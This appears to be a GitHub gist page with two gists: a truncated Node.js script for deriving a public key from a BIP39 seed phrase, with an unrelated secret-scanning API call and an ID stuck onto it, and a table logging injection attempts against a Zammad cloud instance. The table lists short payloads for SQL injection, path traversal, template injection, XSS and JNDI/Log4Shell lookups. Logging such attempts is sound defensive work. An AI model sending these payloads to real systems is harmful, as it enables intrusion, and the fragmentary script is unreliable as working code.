Giovanni LPY learntheropes
learntheropes / derive-pubkey.cjs
Last active February 5, 2026 18:43
derive publickey from seed phrase - this script derives the pubkey stored in the db from the seed phrase backup without revealing any private or confidential info
// From the terminal, in the same directory where this script is saved:
// npm i bip39 bip32 @bitcoinerlab/secp256k1
// MNEMONIC="your mnemonic here" node derive-pubkey.cjs
const bip39 = require('bip39')
const BIP32Factory = require('bip32').default
const ecc = require('@bitcoinerlab/secp256k1')
const bip32 = BIP32Factory(ecc)
gh api -H "Accept: application/vnd.github+json" "/orgs/p2pay/secret-scanning/alerts?per_page=100" --jq 'length'
d6569a58-66cf-4f44-8b07-7c02a5c6efab
learntheropes / injections.md
Last active May 26, 2026 18:58
Zammad cloud injection attempts
| ID | Timestamp | Payload | Type |
|------|----------------------|---------|------|
| 8278 | 2026-05-17T14:22:19Z | `' OR 1=1--` | SQL injection |
| 8279 | 2026-05-17T14:22:21Z | `../../etc/passwd` | Path traversal |
| 8280 | 2026-05-17T14:22:23Z | `{{7*7}}` | Template injection (SSTI) |
| 8281 | 2026-05-17T14:22:25Z | `<script>` | XSS |
| 8282 | 2026-05-17T14:22:27Z | `${jndi:ldap://x}` | JNDI lookup |
| 8283 | 2026-05-17T14:22:29Z | aaaa… (~230 chars) | Buffer/overflow test |
| 8311 | 2026-05-17T14:46:54Z | `${jndi:ldap://audit-marker-research.invalid/a}` | JNDI (LDAP) |
| 8312 | 2026-05-17T14:46:56Z | `${jndi:dns://audit-marker-research.invalid}` | JNDI (DNS) |